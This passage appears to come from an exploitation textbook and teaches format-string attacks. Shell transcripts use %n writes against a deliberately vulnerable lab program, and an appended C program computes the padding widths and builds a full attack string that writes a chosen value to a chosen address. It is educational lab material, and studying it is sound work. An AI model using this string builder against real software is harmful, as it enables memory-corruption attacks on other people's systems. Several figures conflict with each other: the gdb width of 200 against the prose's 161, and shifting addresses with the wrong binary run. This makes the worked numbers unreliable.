Here, next_val is initialized with the value 0x11111111, so any bytes that the four-byte %n writes to test_val spill into it will be apparent.
reader@hacking:~/booksrc $ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/g;x;G}' fmt_vuln.c > fmt_vuln2.c
reader@hacking:~/booksrc $ diff fmt_vuln.c fmt_vuln2.c
7c7
< static int test_val = -72;
---
> static int test_val = -72, next_val = 0x11111111;
27a28
> printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val);
reader@hacking:~/booksrc $ gcc -o fmt_vuln2 fmt_vuln2.c
reader@hacking:~/booksrc $ ./fmt_vuln2 test
The right way:
test
The wrong way:
test
[*] test_val @ 0x080497b4 = -72 0xffffffb8
[*] next_val @ 0x080497b8 = 286331153 0x11111111
reader@hacking:~/booksrc $
As the preceding output shows, the code change has also moved the address of the test_val variable. However, next_val is adjacent to it, four bytes higher, directly in the path of any write that overruns test_val.
For practice, let's write an address into the variable test_val again, using the new address. Last time, a very convenient address of 0xddccbbaa was used. Since each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd is used? With this address, the first (least significant) byte, 0xCD, is easy to write using the %n format parameter by outputting 205 bytes in total, which takes a field width of 161 on top of the 44 bytes already counted (28 bytes of addresses and JUNK padding plus two eight-character %x values). But the next byte to be written is 0xAB, which would need only 171 bytes to have been output. It's easy to increment the byte counter for the %n format parameter, but it's impossible to subtract from it.
reader@hacking:~/booksrc $ ./fmt_vuln2 AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x080497f4 = -72 0xffffffb8
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"
$1 = 200
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x08049794 = -72 0xffffffb8
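The counter arithmetic from the paragraphs above, and the attack string laid out in the transcript, as an added example that is not code from the book: it computes the field width for each byte of a value such as 0x0806abcd, including the case the text calls impossible by subtraction. That case is handled by aiming for the same low byte one 0x100 higher, the standard continuation of this technique and a step beyond what the text has shown so far; it works because each %n stores a full int at overlapping addresses, so only the low byte of each count survives the next write. The 28-byte prefix, the two stack values printed by the leading %x specifiers, the stack value 0 under the padded %x, and the address 0x080497f4 are taken from the transcript as constructed inputs; the simulation models the little-endian x86 layout of the page, with next_val four bytes after test_val.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bytes in the format string before the first %x: four 4-byte addresses
 * separated by three 4-byte "JUNK" pads, as in the transcript (assumed 32-bit). */
#define PREFIX_LEN 28
/* A %x of a 32-bit value prints at most 8 hex digits; keeping every field
 * width at or above that guarantees the padded field is exactly `width` long. */
#define MIN_WIDTH 8

/* Stack values consumed by the %x specifiers in the transcript (constructed
 * from the page's output; the first two only matter for their printed length). */
static const unsigned STACK_ARG1 = 0xbffff3d0u, STACK_ARG2 = 0xb7fe75fcu;
static const unsigned STACK_ARG3 = 0u; /* the value printed under each padded %x */

/* Field widths that carry the running %n counter through the four bytes of
 * `target`, least significant first.  The counter can only grow, so when the
 * wanted byte is below (or too close to) the current count we move up to the
 * next 0x100 block; the overlapping 4-byte writes discard the high bytes.
 * Returns the counter value after the last write. */
int fmt_widths(uint32_t target, int start_count, int widths[4])
{
    int count = start_count;
    for (int i = 0; i < 4; i++) {
        int want = (target >> (8 * i)) & 0xff;
        int value = (count & ~0xff) | want;   /* same 0x100 block, wanted low byte */
        while (value - count < MIN_WIDTH)     /* unreachable by padding: next block */
            value += 0x100;
        widths[i] = value - count;
        count = value;
    }
    return count;
}

/* Cross-check the arithmetic with printf itself: snprintf's return value is
 * exactly what a %n placed at that point in the output would store. */
int count_with_printf(const int widths[4])
{
    int count = PREFIX_LEN + snprintf(NULL, 0, "%x%x", STACK_ARG1, STACK_ARG2);
    for (int i = 0; i < 4; i++)
        count += snprintf(NULL, 0, "%*x", widths[i], STACK_ARG3);
    return count;
}

/* Lay out the attack string: addr, JUNK, addr+1, JUNK, addr+2, JUNK, addr+3,
 * then %x%x and four padded %x%n pairs.  Addresses are little-endian, matching
 * the x86 target on the page.  Returns the length, or 0 if `cap` is too small. */
size_t build_fmt(uint32_t addr, const int widths[4], unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (int i = 0; i < 4; i++) {
        uint32_t a = addr + (uint32_t)i;
        if (n + 8 > cap)
            return 0;
        for (int b = 0; b < 4; b++)
            out[n++] = (unsigned char)(a >> (8 * b));
        if (i < 3) {
            memcpy(out + n, "JUNK", 4);
            n += 4;
        }
    }
    int k = snprintf((char *)out + n, cap - n, "%%x%%x%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n",
                     widths[0], widths[1], widths[2], widths[3]);
    if (k < 0 || (size_t)k >= cap - n)
        return 0;
    return n + (size_t)k;
}

/* Replay the four %n stores against a model of the two adjacent globals
 * (test_val at offset 0, next_val at offset 4, little-endian).  Each %n writes
 * a full int, so write i lands on bytes i..i+3 and the later ones spill into
 * next_val; that spill is what the page's next_val variable is there to show. */
void simulate_writes(int start_count, const int widths[4],
                     uint32_t *test_val, uint32_t *next_val)
{
    unsigned char mem[8];
    for (int b = 0; b < 4; b++) {
        mem[b] = (unsigned char)(*test_val >> (8 * b));
        mem[4 + b] = (unsigned char)(*next_val >> (8 * b));
    }
    int count = start_count;
    for (int i = 0; i < 4; i++) {
        count += widths[i];
        for (int b = 0; b < 4; b++)
            mem[i + b] = (unsigned char)((unsigned)count >> (8 * b));
    }
    uint32_t t = 0, nx = 0;
    for (int b = 0; b < 4; b++) {
        t |= (uint32_t)mem[b] << (8 * b);
        nx |= (uint32_t)mem[4 + b] << (8 * b);
    }
    *test_val = t;
    *next_val = nx;
}

int main(void)
{
    const uint32_t target_addr = 0x080497f4u; /* &test_val from the transcript */
    const uint32_t value = 0x0806abcdu;       /* the awkward value from the text */
    int widths[4];
    int start = PREFIX_LEN + 16;              /* the two leading %x print 8 chars each */
    int final = fmt_widths(value, start, widths);
    printf("widths: %d %d %d %d (counter ends at %d = 0x%x, printf agrees: %d)\n",
           widths[0], widths[1], widths[2], widths[3], final, final, count_with_printf(widths));

    unsigned char fmt[128];
    size_t len = build_fmt(target_addr, widths, fmt, sizeof fmt);
    printf("attack string (%zu bytes): ", len);
    for (size_t i = 0; i < len; i++)
        putchar(fmt[i] >= 0x20 && fmt[i] < 0x7f ? fmt[i] : '.');
    putchar('\n');

    uint32_t test_val = (uint32_t)-72, next_val = 0x11111111u;
    simulate_writes(start, widths, &test_val, &next_val);
    printf("test_val = 0x%08x, next_val = 0x%08x\n", test_val, next_val);
    return 0;
}
```

The start count is the one thing to re-derive on every run: the two leading %x print whatever happens to be on the stack, and a value with fewer than eight hex digits shortens the count, so read it off the program's own output (as the AAAA%x%x%x%x probe does) before trusting the widths. The simulation also makes the cost of the technique visible: the fourth write leaves the high bytes of its count in next_val, so anything living in the three bytes after the target is clobbered.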